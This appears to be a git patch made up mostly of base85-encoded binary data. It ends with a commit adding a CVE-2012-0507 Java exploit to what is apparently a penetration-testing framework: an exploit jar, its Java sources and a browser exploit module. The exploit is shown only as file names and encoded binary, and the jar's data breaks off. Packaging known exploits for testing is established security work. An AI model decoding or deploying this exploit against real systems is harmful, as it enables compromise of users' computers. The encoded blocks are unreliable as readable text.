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 delta 17847 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 Date: Thu, 29 Mar 2012 10:31:14 -0500 Subject: [PATCH 46/46] Add CVE-2012-0507 (Java) --- data/exploits/CVE-2012-0507.jar | Bin 0 -> 6944 bytes .../exploits/CVE-2012-0507/Exploit.java | 58 ++++++ .../source/exploits/CVE-2012-0507/Help.java | 82 +++++++++ .../browser/java_atomicreferencearray.rb | 173 ++++++++++++++++++ 4 files changed, 313 insertions(+) create mode 100644 data/exploits/CVE-2012-0507.jar create mode 100644 external/source/exploits/CVE-2012-0507/Exploit.java create mode 100644 external/source/exploits/CVE-2012-0507/Help.java create mode 100644 modules/exploits/multi/browser/java_atomicreferencearray.rb 
diff --git a/data/exploits/CVE-2012-0507.jar b/data/exploits/CVE-2012-0507.jar new file mode 100644 index 0000000000000000000000000000000000000000..e0c2d68188aa782f75ca6049153c5159bc8c61ad GIT binary patch literal 6944 zcmaJ`1ymf}l14+YAcGA~g1cvspo0wV4hal05L^Zg?lQPL1b2so2n_D-POuO{fB=&O z$R_{WeZTDPt9$yK+vnb@uI|%yzpDDQR57v0(C+^l*MR{tXnzr0G%PfA1wC0Fh=wBH z-3S^QCYqKi&i&szF#da+*8i(a_G`z#mDOc6Ac_jQdc5k27wTi9YN|ZE(}b!#oD*Y{ zEjs*jLR)+8yejJ45cO%VYAoEWBVZp54Lb}gbDslc%SyRNX-JXza-V|BXP@QR{@ne{ z9sLhS+B@@{m3}?u_w}bEm;ZPR=3lE$9=3cwd|H;ijxLtgM$EdN?lzWA@-EKKHc(F& zcV4KYrH6-?o~iDv7V(`1A8m9MSOttPt{_ z@ePtfk51x2lHa$8+y>rlVZLGmI-8^pe-_*HhF^dB?D&=;NDPA?F{lnx(v!nc>{B6m zI6!istPFc!8P1qO3#IK~R;J3F3dcp?ps10MQ*&P 